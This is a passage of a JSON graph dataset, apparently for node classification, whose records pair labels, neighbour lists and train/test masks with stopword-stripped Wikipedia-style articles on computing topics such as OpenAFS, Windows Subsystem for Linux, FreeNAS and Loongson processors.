    "text": "OpenAFS:openafs openafs open-source implementation andrew distributed file system afs afs originally developed carnegie mellon university developed commercial product transarc corporation subsequently acquired ibm linuxworld 15 august 2000 ibm announced plans release version commercial afs product ibm public license became openafs today openafs actively developed wide range operating system families including aix mac os x darwin hp-ux irix solaris linux microsoft windows freebsd netbsd openbsd openafs foundation established may 20 2013 non-profit organization dedicated fostering stability growth openafs governance project split board elders consider issues strategic direction gatekeepers control source repository although legal entity owns openafs source code copyright many files attributed ibm source covered ipl however several files tree covered university vanity licenses applicable licenses listed file source repository called openafs/doc/license contributors last five years made significant improvements implementation afs3 protocol without breaking interoperability ibm/transarc releases since announcement written several large development projects integrated 64-bit ms-windows support ms-windows 7 support apple-mac os x v10.4-v10.9 support demand attach fileserver many development projects various stages completion following several prominent examples existing user base includes small single server cells well large multinational deployments spanning academia private research laboratories government commercial entities small snapshot deployed afs cells found reviewing contents cellservdb file distributed openafs",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      11492,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3323,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      1304,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      5474,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      5612,
      7663,
      11256,
      2555,
      2045,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 9837,
    "label": 1,
    "text": "Metadatabase:metadatabase metadatabase database model 1 metadata management 2 global query independent databases 3 distributed data processing word metadatabase addition dictionary originally metadata common term referring simply data data tags keywords markup headers however technology concept metadata extended also include data knowledge representation information models e.g. relations entities-relationships objects application logic e.g. production rules analytic models e.g. simulation optimization mathematical algorithms case analytic models also referred modelbase classes metadata integrated modeling ontology give rise stable set meta-relations tables metadata individual models interpreted metadata entered tables models inserted retrieved updated deleted manner ordinary data ordinary relational database users also formulate global queries requests processing local databases metadatabase using globally integrated metadata metadatabase structure implemented open technology relational databases metadatabase technology developed rensselaer polytechnic institute troy new york group faculty students see references end article starting late 1980s main contribution includes extension concept metadata metadata management original approach designing database metadata applications conceptual results continue motivate new research new applications level particular design openness scalability tied particular ontology proposed requires reverse-representation application models order save meta-relations theory ontology neutral proven industrial applications however needs development establish field open technology requirement reverse-representation common global information integration technology way facilitate metadatabase approach distribute core portion local site allow peer-to-peer translation fly",
    "neighbors": [
      7802,
      2901,
      9286,
      10471
    ],
    "mask": "Test"
  },
  {
    "node_id": 9838,
    "label": 2,
    "text": "IBM_System_Management_Facilities:ibm system management facilities ibm system management facility smf component ibm z/os mainframe computers providing standardised method writing records activity file data set use z/os term smf provides full instrumentation baseline activities running ibm mainframe operating system including i/o network activity software usage error conditions processor utilization etc one prominent components z/os uses smf ibm resource measurement facility rmf rmf provides performance usage instrumentation resources processor memory disk cache workload virtual storage xcf coupling facility rmf technically priced extra cost feature z/os bmc sells competing alternative cmf smf forms basis many monitoring automation utilities smf record numbered type e.g smf 120 smf 89 installations great control much little smf data collect records written software ibm products generally record type 128 higher record types subtypes example type 70 subtype 1 records written rmf record cpu activity list common smf record types major record types especially created rmf continue evolve rapid pace release z/os brings new fields different processor families coupling facility levels also change data model smf record data two ways two ways declared use one used time order fallback alternative data periodically dumped sequential files example tape drives using ifasmfdp smf dump utility ifasmfdl using log streams ifasmfdp also used split existing smf sequential files copy files two dump programs produce output involve changes smf records elaboration chain changing jcl call new dump utility",
    "neighbors": [
      7,
      3966,
      6678,
      2168,
      9977,
      7162,
      3323,
      10652,
      5598
    ],
    "mask": "Test"
  },
  {
    "node_id": 9839,
    "label": 2,
    "text": "Windows_Subsystem_for_Linux:windows subsystem linux windows subsystem linux wsl compatibility layer running linux binary executables elf format natively windows 10 windows server 2019 may 2019 wsl 2 announced introducing important changes real linux kernel subset hyper-v features since june 2019 wsl 2 available windows 10 customers windows insider program including home edition first release wsl provides linux-compatible kernel interface developed microsoft containing linux kernel code run gnu user space top ubuntu opensuse suse linux enterprise server debian kali linux user space might contain bash shell command language native gnu/linux command-line tools sed awk etc programming language interpreters ruby python etc even graphical applications using x11 server host side architecture redesigned wsl 2 linux kernel running lightweight virtual machine environment introduced anniversary update august 2 2016 ubuntu image available fall creators update released october 17 2017 moved installation process linux distributions windows store introduced suse images wsl available 64 bit versions windows 10 version 1607 also available windows server 2019 microsoft announced wsl 2 may 6th 2019 features completely new vm-based backend based subset hyper-v features lieu prior system call adaptation layer planned release windows insider program june 2019 microsoft first foray achieving unix-like compatibility windows began microsoft posix subsystem superseded windows services unix via mks/interix eventually deprecated release windows 8.1 technology behind windows subsystem linux originated unreleased project astoria enabled android applications run windows 10 mobile first made available windows 10 insider preview build 14316 whereas microsoft previous projects third-party cygwin focused creating unique unix-like environments based posix standard wsl aims native linux compatibility instead wrapping non-native functionality win32 system calls prior systems utilized wsl initial design wsl 1 leveraged nt kernel executive serve linux programs special isolated minimal processes known pico processes attached kernel mode pico providers dedicated system call exception handlers distinct vanilla nt process opting reutilize existing nt implementations wherever possible though wsl via initial design much faster arguably much popular brethren unix-on-windows projects windows kernel engineers found difficulty trying increase wsl performance syscall compatibility trying reshape existing nt kernel recognize operate correctly linux api microsoft ignite conference 2018 microsoft engineers gave high-level overview new lightweight hyper-v vm technology containerization virtualized kernel could make direct use nt primitives host 2019 microsoft announced completely redesigned wsl architecture wsl 2 using lightweight vm technology hosting actual customized linux kernel images claiming full syscall compatibility microsoft envisages wsl primarily tool developers – especially web developers work open source projects wsl uses fewer resources typical virtual machine prior wsl direct way run linux software windows environment also allowing users use windows apps linux tools set files lxss manager service service charge interacting subsystem drivers way bash.exe confused shells provided linux distributions launches linux processes well handling linux system calls binary locks execution linux processes invoked particular user go linux instance usually first invoked process init applications closed instance closed codice_1 command used manage distributions windows subsystem linux command-line list available distributions set default distribution uninstall distributions command also used run linux binaries windows command prompt windows powershell codice_1 replaces codice_3 deprecated windows 10 1803 later run codice_4 command wsl using powershell example using codice_5 command command prompt wsl 1 design featured hardware emulation virtualization unlike projects colinux makes direct use host file system parts hardware network web servers example accessed interfaces ip addresses configured host shares restrictions use ports require administrative permissions ports already occupied applications guarantees interoperability certain locations system folders configurations whose access/modification restricted even running root sudo shell instance elevated privileges must launched order get sudo give real root privileges allow access wsl 1 capable running linux software 32-bit binaries require specific linux kernel services implemented wsl due lack real linux kernel wsl 1 kernel modules device drivers ca n't run wsl 2 however makes use live virtualized linux kernel instances possible run graphical gui applications mozilla firefox installing x11 server within windows host environment vcxsrv xming although without caveats lack audio support hardware acceleration resulting poor graphics performance support opencl cuda also implemented currently although planned future releases microsoft stated wsl 1 oriented development applications desktop environment production servers recommending use virtual machines hyper-v kubernetes azure purposes benchmarks wsl 1 performance often near native linux ubuntu debian intel clear linux linux distributions i/o tests bottleneck wsl redesigned wsl 2 backend claimed microsoft offer twenty-fold increases speed certain operations compared wsl 1 version 2 introduces changes architecture microsoft opted virtualization highly optimized subset hyper-v features order run provided kernel underlying distributions promising performance equivalent wsl 1 backwards compatibility mind developers n't need change anything published distributions even version exists new wsl global configuration way 1 ini file named codice_6 located user folder distribution installation resides inside ext4-formatted filesystem inside virtual disk host file system transparently accessible 9p protocol users microsoft promised 20 times read/write performance wsl 1",
    "neighbors": [
      11270,
      9735,
      2568,
      5643,
      4624,
      6674,
      537,
      8729,
      540,
      9245,
      3102,
      9762,
      8227,
      6180,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      582,
      8262,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      1632,
      3170,
      8296,
      622,
      1647,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      5755,
      7290,
      10879,
      6787,
      2180,
      2181,
      6281,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      7847,
      2221,
      5300,
      7351,
      7356,
      2749,
      10428,
      2244,
      8391,
      200,
      9930,
      9420,
      1741,
      3791,
      1750,
      9946,
      4316,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      246,
      4857,
      3834,
      8954,
      6396,
      8445,
      1791,
      8959,
      11519,
      3856,
      5397,
      3351,
      8473,
      8985,
      11546,
      8988,
      10016,
      5413,
      6438,
      808,
      3881,
      5928,
      10024,
      10026,
      10029,
      7983,
      10033,
      1844,
      9525,
      11572,
      823,
      10039,
      6972,
      5437,
      3394,
      8517,
      4423,
      3922,
      4439,
      5465,
      2910,
      2402,
      1379,
      2919,
      4458,
      6506,
      8554,
      9066,
      5492,
      9593,
      2943,
      3970,
      2948,
      8582,
      10631,
      1418,
      5003,
      5004,
      1935,
      8080,
      11677,
      929,
      4001,
      11683,
      430,
      6062,
      7088,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      11221,
      5078,
      1498,
      5594,
      478,
      479,
      6114,
      6115,
      10727,
      1513,
      6637,
      9709,
      7663,
      2545,
      6641,
      11249,
      8692,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 9840,
    "label": 2,
    "text": "8.3_filename:8.3 filename 8.3 filename also called short filename sfn filename convention used old versions dos versions microsoft windows prior windows 95 windows nt 3.5 also used modern microsoft operating systems alternate filename long filename compatibility legacy programs filename convention limited fat file system similar 8.3 file naming schemes also existed earlier cp/m trs-80 atari data general digital equipment corporation minicomputer operating systems 8.3 filenames limited eight characters directory specifier followed optionally filename extension consisting period codice_1 three characters systems support 8.3 filenames excess characters ignored file name extension codice_1 present significance codice_3 codice_4 equivalent furthermore systems file directory names uppercase although systems use 8.3 standard usually case-insensitive hence codice_5 equivalent name codice_6 however non-8.3 operating systems almost modern operating systems accessing 8.3 file systems including dos-formatted diskettes also including modern memory cards networked file systems underlying system may alter filenames internally preserve case avoid truncating letters names example case vfat vfat variant fat extended directory format introduced windows 95 windows nt 3.5 allowed mixed-case unicode long filenames lfns addition classic 8.3 names using multiple 32-byte directory entry records long filenames way one recognised old 8.3 system software valid directory entry maintain backward-compatibility legacy applications dos windows 3.1 fat vfat filesystems 8.3 filename automatically generated every lfn file still renamed deleted opened although generated name e.g codice_7 may show little similarity original ntfs filesystems generation 8.3 filenames turned 8.3 filename obtained using kernel32.dll function getshortpathname although compulsory algorithm creating 8.3 name lfn windows uses following convention ntfs file system used windows nt family supports lfns natively 8.3 names still available legacy applications optionally disabled improve performance situations large numbers similarly named files exist folder iso 9660 file system mainly used compact discs similar limitations basic level 1 additional restriction directory names contain extensions characters notably hyphens allowed filenames level 2 allows filenames 31 characters compatible classic amigaos classic mac os filenames 2001 microsoft antitrust case names micros~1 micros~2 humorously used refer companies might exist proposed split microsoft legacy technology used wide range products devices standard interchanging information compact flash cards used cameras vfat lfn long filenames introduced windows 95/98/me retained compatibility vfat lfn used nt-based systems windows nt/2k/xp uses modified 8.3 shortname filename contains lowercase letters combination lowercase basename uppercase extension vice versa special characters fits within 8.3 limits vfat entry created windows nt later versions xp instead two bits byte 0x0c directory entry used indicate filename considered entirely partially lowercase specifically bit 4 means lowercase extension bit 3 lowercase basename allows combinations codice_33 codice_34 codice_35 operating systems support creates backward-compatibility filename mangling problem older windows versions 95 98 see all-uppercase filenames extension used therefore change capitalization file transported usb flash drive cause problems operating systems exhibit case-insensitive filename behavior dos windows current 2.6 versions linux recognize extension reading mount option shortname determines whether feature used writing directory table special type file represents directory file directory stored within represented 32-byte entry table entry records name extension attributes archive directory hidden read-only system volume date time creation address first cluster file/directory data finally size file/directory legal characters dos filenames include following excludes following ascii characters dos filenames oem character set code 0xe5 first byte see makes troubles extra-ascii characters used directory entries root directory region subdirectories following format sometimes may desirable convert long filename short filename example working command prompt simple rules followed attain correct 8.3 filename find sure sfn 8.3 names files directory use codice_49 shows short names one long names codice_50 shows short names original dir listing format windows nt-based operating systems command prompt codice_51 applets accept long filenames wildcard characters question mark asterisk '* long filenames spaces need escaped i.e enclosed single double quotes starting windows vista console commands powershell applets perform limited pattern matching allowing wildcards filename subdirectory file path silently substituting first matching directory entry example codice_52 change current directory codice_53",
    "neighbors": [
      2432,
      3330,
      5514,
      6797,
      11149,
      3856,
      2193,
      6289,
      8976,
      532,
      8988,
      6813,
      9762,
      5413,
      5158,
      7847,
      10149,
      1193,
      5293,
      7983,
      9907,
      52,
      1844,
      6712,
      4409,
      6587,
      9533,
      576,
      3522,
      4170,
      6476,
      589,
      7244,
      9420,
      5969,
      6358,
      5975,
      2395,
      1509,
      10087,
      6126,
      7663,
      3571,
      7540,
      10101,
      636
    ],
    "mask": "Test"
  },
  {
    "node_id": 9841,
    "label": 7,
    "text": "Rich_web_application:rich web application rich web application originally called rich internet application ria installable internet application web application many characteristics desktop application software concept closely related single-page application may allow user interactive features drag drop background menu wysiwyg editing etc html5 current standard delivering rich web applications supported major browsers adobe flash manipulates vector raster graphics provide animation text drawings still images supports bidirectional streaming audio video capture user input via mouse keyboard microphone camera flash contains object-oriented language called actionscript supports automation via javascript flash language jsfl flash content may displayed various computer systems devices using adobe flash player available free charge common web browsers mobile phones electronic devices using flash lite apache flex formerly adobe flex software development kit sdk development deployment cross-platform rias based adobe flash platform initially developed macromedia acquired adobe systems flex donated adobe apache software foundation 2011 java applets used create interactive visualizations present video three dimensional objects media java applets appropriate complex visualizations require significant programming effort high level language communications applet originating server javafx software platform creating delivering rias run across wide variety connected devices current release javafx 11 sept 2018 enables building applications desktop browser mobile phones comes 3d support tv set-top boxes gaming consoles blu-ray players platforms planned java fx runs plug-in java applet via webstart silverlight proposed microsoft another proprietary alternative technology widely accepted instance lacks support many mobile devices examples application video streaming events including 2008 summer olympics beijing 2010 winter olympics vancouver 2008 conventions major political parties united states silverlight also used netflix instant video streaming service silverlight longer active development supported microsoft edge microsoft recent browser rias could use xforms enhance functionality using xml xslt along xhtml css javascript also used generate richer client side ui components like data tables resorted locally client without going back server mozilla internet explorer browsers support terms rich client rich internet application introduced white paper march 2002 macromedia adobe though concept existed number years earlier names including remote scripting microsoft april 1999 x internet forrester research october 2000 rich web application rias present indexing challenges web search engines adobe flash content least partially indexable security improve application software example use sandboxes automatic updates extensions remain subject vulnerabilities access often much greater native web applications security purposes rias run client portions within special isolated area client desktop called sandbox sandbox limits visibility access file-system operating system client application server side connection approach allows client system handle local activities reformatting forth thereby lowering amount frequency client-server traffic especially versus client-server implementations built around so-called thin clients november 2011 number announcements demonstrated decline demand rich internet application architectures based plug-ins order favor html5 alternatives adobe announced flash would longer produced mobile tv refocusing efforts adobe air pundits questioned continued relevance even desktop described beginning end research motion rim announced would continue develop flash playbook decision questioned commentators rumors state microsoft abandon silverlight version 5 released combination announcements proclaiming end line browser plug-ins",
    "neighbors": [
      6657,
      5636,
      9229,
      2579,
      1556,
      10270,
      9770,
      7212,
      10284,
      559,
      4658,
      4661,
      3639,
      64,
      5707,
      10834,
      6231,
      6747,
      7784,
      1642,
      9834,
      115,
      9843,
      4728,
      124,
      1664,
      10910,
      8351,
      7340,
      9908,
      11449,
      4797,
      9408,
      11466,
      7885,
      4310,
      4822,
      5849,
      8923,
      6366,
      737,
      4326,
      8443,
      7943,
      1802,
      10506,
      7965,
      10020,
      11559,
      1834,
      10026,
      10057,
      3920,
      865,
      4972,
      8557,
      10097,
      3442,
      6528,
      3971,
      3462,
      8584,
      910,
      11154,
      7572,
      5026,
      2485,
      1468,
      8644,
      974,
      4048,
      5078,
      5593,
      479,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      8689,
      502,
      5114,
      9726
    ],
    "mask": "Test"
  },
  {
    "node_id": 9842,
    "label": 4,
    "text": "Attic_(backup_software):attic backup software attic deduplicating backup software various unix-like operating systems attic development began 2010 accepted debian august 2013 attic available pip notably part debian ubuntu arch slackware attic offers efficient deduplicated compressed optionally encrypted authenticated backups backup includes metadata like owner/group permissions posix acls extended file attributes handles special files also like hardlinks symlinks devices files etc internally represents files archive stream metadata similar tar unlike tools git borg project created extensive documentation internal workings attic uses rolling hash implement global data deduplication compression defaults zlib encryption aes via openssl authenticated hmac 2015 attic forked borg support open faster paced development according developers many issues attic fixed fork backward compatibility original program lost non-reversible upgrade process exists borg 1.0.0 released 5 march 2016 borg 1.1.0 released 7 october 2017 2018 borg active development many contributors attic developed stable releases available various linux distributions debian ubuntu fedora opensuse others ports collection various bsd derivatives project provides pre-built binaries linux freebsd macos",
    "neighbors": [
      6049,
      9025,
      6119,
      6280,
      8554,
      1358,
      7663,
      7983,
      5492,
      11221,
      823
    ],
    "mask": "Train"
  },
  {
    "node_id": 9843,
    "label": 5,
    "text": "ELinks:elinks elinks free text-based console web browser unix-like operating systems began late 2001 experimental fork petr baudiš links web browser hence e name since e come stand enhanced extended 1 september 2004 baudiš handed maintainership project danish developer jonas fonseca citing lack time interest desire spend time coding rather reviewing organising releases 17 march 2017 openbsd removed elinks ports tree citing concerns security issues lack responsiveness developers",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9245,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      3191,
      119,
      4728,
      637,
      1664,
      2182,
      3218,
      8854,
      8857,
      10910,
      8351,
      4777,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      8443,
      9987,
      7943,
      5397,
      278,
      10012,
      7965,
      1834,
      7983,
      823,
      10057,
      11082,
      10060,
      2893,
      339,
      5469,
      5470,
      3428,
      8557,
      5492,
      3961,
      6528,
      3971,
      3462,
      8582,
      8584,
      7572,
      5026,
      944,
      5054,
      10174,
      9152,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      10727,
      8169,
      10732,
      494,
      1520,
      7152,
      6133,
      5622,
      5114,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9844,
    "label": 2,
    "text": "FreeNAS:freenas freenas free open-source network-attached storage nas software based freebsd openzfs file system licensed terms bsd license runs commodity x86-64 hardware freenas supports windows macos unix clients various virtualization hosts xenserver vmware using smb afp nfs iscsi ssh rsync ftp/tftp protocols advanced freenas features include full-disk encryption plug-in architecture third-party software freenas supports openzfs filesystem provides data integrity checking prevent data corruption enable point time snapshotting replication several levels redundancy including striping mirroring striped mirrors raid 1+0 three levels raidz freenas managed comprehensive web interface supplemented minimal shell console handles essential administrative functions web interface supports storage pool configuration user management sharing configuration system maintenance embedded system appliance freenas boots usb flash device sata dom image configured using usb flash/cd-rom bootable installer freenas operating system fully independent storage disks allowing configuration database encryption keys backed restored fresh installation os separation also allows freenas system upgrades performed web interface freenas project started october 2005 olivier cochard-labbé based m0n0wall embedded firewall freebsd 6.0 volker theile joined project july 2006 became project lead april 2008 september 2009 development team concluded project release .7 due complete rewrite order accommodate modern features plug-in architecture volker theile decided project best reimplemented using debian linux shifted development efforts interim corenas project eventually openmediavault continues project lead cochard-labbé responded community objections debian version freenas resumed activity project oversaw transfer freenas user ixsystems developers daisuke aoyama michael zoon continued developing freenas 7 nas4free project meanwhile ixsystems rewrote freenas new architecture based freebsd 8.1 releasing freenas 8 beta november 2010 plug-in architecture arrived freenas 8.2 freenas versioning synchronized freebsd clarity freenas 8.3 introduced full-disk encryption freebsd 9.1-based freenas 9.1 brought updated plug-in architecture compatible trueos warden jail management framework freenas 9.1 also first version freenas use community-supported openzfs v5000 feature flags freenas 9.2 based freebsd 9.2 included performance improvements introduced rest api remote system administration freenas 9.3 based freebsd 9.3 introduced zfs-based boot device initial setup wizard high-performance in-kernel iscsi server freenas 9.10 based freebsd 10.3-rc3 brought end freenas/freebsd synchronized naming introduced graphite monitoring support experimental support bhyve hypervisor october 2015 ten years original freenas release freenas 10 alpha released providing preview would become freenas corral ga march 15 2017 freenas corral introduced new graphical user interface command-line interface underlying middleware container management system virtual machine management system freenas corral departs freenas providing nas functionality also hyper-converged functionality thanks integrated virtual machine support however april 12 2017 ixsystems announced freenas corral would instead relegated 'technology preview citing issues general instability lack feature parity 9.10 jails iscsi etc users experiencing lower performance expected departure project lead instead decision made revert existing 9.10 code bring corral features 9.10.3 may 2017 ix systems announced freenas 11 would imminently released based 9.10 included features update freebsd operating system virtual machine management updates jails new beta user interface along lines corral based angular js 8.0 reimplementation freenas moved project m0n0bsd/m0n0wall/php-based architecture one based freebsd nanobsd embedded build system python programming language django web application framework dōjō toolkit javascript library also used lighttpd web server replaced nginx freenas 8.2 terminated successor 9.10.2 known freenas corral retained nginx web server zfs-based boot device freenas replaces django/dōjō web application framework original one freenas 11 implemented new interface using angular js features plugins shown 11.0 branch",
    "neighbors": [
      2051,
      6153,
      10761,
      1049,
      4636,
      9762,
      1071,
      9784,
      5177,
      8266,
      5710,
      7249,
      9306,
      1118,
      607,
      8816,
      9343,
      2180,
      2212,
      3237,
      684,
      3248,
      1718,
      7863,
      5819,
      7871,
      11459,
      7364,
      9927,
      8395,
      8909,
      6864,
      8404,
      10455,
      6361,
      8410,
      6371,
      5356,
      9452,
      11506,
      5363,
      1273,
      7425,
      1801,
      274,
      6438,
      10535,
      4908,
      7983,
      9009,
      11573,
      823,
      850,
      6491,
      2910,
      7521,
      1891,
      5482,
      7027,
      5492,
      2421,
      2424,
      3450,
      7552,
      1927,
      10631,
      9625,
      1946,
      414,
      9119,
      929,
      11698,
      1465,
      8122,
      3006,
      11201,
      8644,
      1990,
      4561,
      10202,
      3551,
      998,
      4073,
      2545,
      3058,
      9201
    ],
    "mask": "Test"
  },
  {
    "node_id": 9845,
    "label": 9,
    "text": "David_J._Farber:david j. farber david j. farber born april 17 1934 professor computer science noted major contributions programming languages computer networking currently distinguished professor co-director cyber civilization research center keio university japan farber graduated stevens institute technology 1956 began 11-year career bell laboratories helped design first electronic switching system ess-1 snobol programming languages subsequently held industry positions rand corporation scientific data systems followed academic positions university california irvine university delaware irvine research work focused creating world first operational distributed computer system member electrical engineering department university delaware helped conceive organize major american research networks csnet nsfnet national research education network nren helped create nsf/darpa-funded gigabit network test bed initiative served chairman gigabit test bed coordinating committee farber subsequently appointed alfred fitler moore professor telecommunication systems university pennsylvania also held appointments professor business public policy wharton school business faculty associate annenberg school communication served chief technologist us federal communications commission 2000–2001 leave university farber founding editor icannwatch serves board advisers context relevant liquid information company farber aaas fellow ieee fellow acm fellow recipient 1995 sigcomm award lifelong contributions computer communications served board directors electronic frontier foundation electronic privacy information center advisory board board trustees internet society member presidential advisory committee high performance computing communications information technology next generation internet runs large 25,000+ readership mailing list called interesting-people 2012 memory son established joseph m. farber prize stevens institute technology recognizes graduating senior majoring one disciplines college arts letters displays keen interest concern civil liberties importance preserving protecting human rights august 3 2013 farber inducted pioneers circle internet hall fame elected aaas fellow council american association advancement science 2018",
    "neighbors": [
      8262,
      10569,
      3178,
      11659,
      6352,
      8373,
      1783,
      472
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9846,
    "label": 2,
    "text": "Reference_monitor:reference monitor operating systems architecture reference monitor concept defines set design requirements reference validation mechanism enforces access control policy subjects e.g. processes users ability perform operations e.g. read write objects e.g. files sockets system properties reference monitor captured acronym neat means example windows 3.x 9x operating systems built reference monitor whereas windows nt line also includes windows 2000 windows xp designed contain reference monitor although clear properties tamperproof etc ever independently verified level computer security intended provide claim reference validation mechanism satisfies reference monitor concept correctly enforce system access control policy must invoked mediate security-sensitive operations must tampered undergone complete analysis testing verify correctness abstract model reference monitor widely applied type system needs enforce access control considered express necessary sufficient properties system making security claim according ross anderson reference monitor concept introduced james anderson influential 1972 paper peter denning 2013 oral history stated james anderson credited concept paper scott graham presented 1972 conference systems evaluated b3 trusted computer system evaluation criteria tcsec must enforce reference monitor concept",
    "neighbors": [
      4067,
      3624,
      8302,
      7983,
      8976,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9847,
    "label": 1,
    "text": "PhpSQLiteAdmin:phpsqliteadmin phpsqliteadmin name two independent web applications written php managing sqlite databases phpsqliteadmin web-based client leverages php scripting sqlite file-database system provide simple way users create databases create tables query data using non-industry-standard sqlite syntax",
    "neighbors": [
      5546,
      8644
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9848,
    "label": 2,
    "text": "BOOPSI:boopsi boopsi basic object oriented programming system intuition object-oriented programming system amigaos extends amigaos windowing environment intuition object-oriented subsystem allowing hierarchy object classes every class defines single gui widget interface event boopsi made easier developers create system widgets create standardized graphical user interfaces magic user interface reaction examples complete widget toolkits built boopsi toolkits become popular amiga software programmers generate maintain graphical user interfaces object-oriented design brings advantages straightforward coupling objects objects example programmer may link numerical input field sliding control user adjusts sliding control numerical value input field changes automatically boopsi officially introduced amigaos 2.0 extended later releases",
    "neighbors": [
      1664,
      8832,
      1666,
      3462,
      8582,
      6797,
      2062,
      5264,
      2193,
      9491,
      1812,
      2197,
      3734,
      9236,
      9245,
      10654,
      3233,
      9249,
      4387,
      3876,
      9762,
      11559,
      9128,
      4777,
      8618,
      2603,
      5165,
      5677,
      3631,
      432,
      6062,
      8114,
      8115,
      692,
      8369,
      11442,
      576,
      1347,
      1348,
      8644,
      4550,
      8771,
      11076,
      10570,
      8524,
      5709,
      7629,
      6995,
      4564,
      4822,
      9943,
      10841,
      9434,
      479,
      2658,
      10470,
      8554,
      9579,
      5612,
      11370,
      5743,
      8303,
      2673,
      8304,
      10480,
      5492,
      11123,
      5754,
      7292,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9849,
    "label": 3,
    "text": "King_Kong_2:_Yomigaeru_Densetsu:king kong 2 yomigaeru densetsu game unofficially re-released english south korean company zemina 1987 킹콩ii king kong ii",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 9850,
    "label": 4,
    "text": "Tanium:tanium tanium privately held endpoint security systems management company based emeryville california founded 2007 father son david hindawi orion hindawi co-founders management company bigfix orion named ceo february 2016 david serves executive chairman",
    "neighbors": [
      7306
    ],
    "mask": "Test"
  },
  {
    "node_id": 9851,
    "label": 3,
    "text": "Loongson:loongson loongson family general-purpose mips64 cpus developed institute computing technology ict chinese academy sciences cas china chief architect professor formerly called godson loongson result public–private partnership blx ic design corporation founded 2002 ict jiangsu zhongyi group based beijing blx focuses designing 64-bit loongson general-purpose embedded processors together developing software tools reference platforms stmicroelectronics fabricates markets loongson chips blx fabless current loongson instruction set mips64 internal microarchitecture independently developed ict early implementations family lacked four instructions patented mips technologies avoid legal issues 2007 deal reached mips technologies ict stmicroelectronics bought mips license loongson thus processor promoted mips-based mips-compatible instead mips-like june 2009 ict licensed mips32 mips64 architectures directly mips technologies august 2011 loongson technology corp. ltd. licensed mips32 mips64 architectures mips technologies inc. continued development mips-based loongson cpu cores first revision loongson architecture loongson1 godson-232 core pure 32-bit cpu running clock speed 266 mhz fabricated 0.18 micron cmos process 8 kb data cache 8 kb instruction cache 64-bit floating-point unit capable 200 double-precision mflops intended embedded applications point sale pos systems high performance 64-bit architecture needed loongson 2 adds 64-bit ability loongson architecture initially running 500 mhz later revisions godson 2e produced run 1 ghz godson 2f released market early 2008 ran 1.2 ghz 65 nm loongson 3 godson-3 able run clock speed near 1 ghz 4 cpu cores ~15 w first 8 cores later 40 w april 2010 loongson 3a released ddr2/3 dram support 2017 loongson released latest version 3a cpu 3a3000 one domestic cpu china loongson 3a3000 commercialized recently exhibition nanjing 2017 based loongson 3a3000 motherboard developers computer quietly debut 3a3000 loongson latest cpu model 2017 using loongisa instruction set designed quad-core 64-bit clocked 1.5 ghz power consumption 30w performance frequency 1.5ghz 3a3000 single-threaded performance significantly behind intel amd products 3a3000 one-third intel i5 4460 3.2g two versions loongson-3b godson-3b first featuring 32 nm 6-core processor second version 28 nm 8-core processor version clocked 1.2 ghz 1.5 ghz loongson-3b exceptional energy efficiency terms performance per watt executing 192 gflops using 40 watts cpu core 64 kb l1 cache 128 kb l2 cache cores share common 8 mb l3 cache helps reduce cache miss rate ict launched loongson-3b-based six-core desktop solution technical specifications desktop solution uses optimized version fedora 13 lot software ported available kingsoft wps office suite manufacturer states user experience desktop solution significantly improved loongson-3a based predecessor results benchmark test conducted april 2014 available loongson 3 adds 200 new instructions loongson 2 addition specific benefit speeding intel x86 cpu emulation cost 5 total die area new instructions help emulation performance example qemu known example new instructions reduce impact executing x86/cisc-style instructions mips pipeline added improvements qemu ict loongson-3 achieves average 70 performance executing native binaries running x86 binaries nine benchmarks unlike processors intel advanced micro devices via technologies loongson directly support x86 instruction set processor main operating system linux theory os mips support also work example windows ce ported loongson-based system minimal effort 2010 lemote ported android distribution loongson platform many operating systems work loongson gnu compiler collection gcc main compiler software development loongson platform ict also ported open64 loongson ii platform open source applications linux platform ported little effort common open-source applications including openoffice.org mozilla firefox pidgin mplayer applications written java platform supported .net applications unofficial port mono common language runtime available online march 2006 €100 loongson ii computer design called longmeng dragon dream announced lemote june 2006 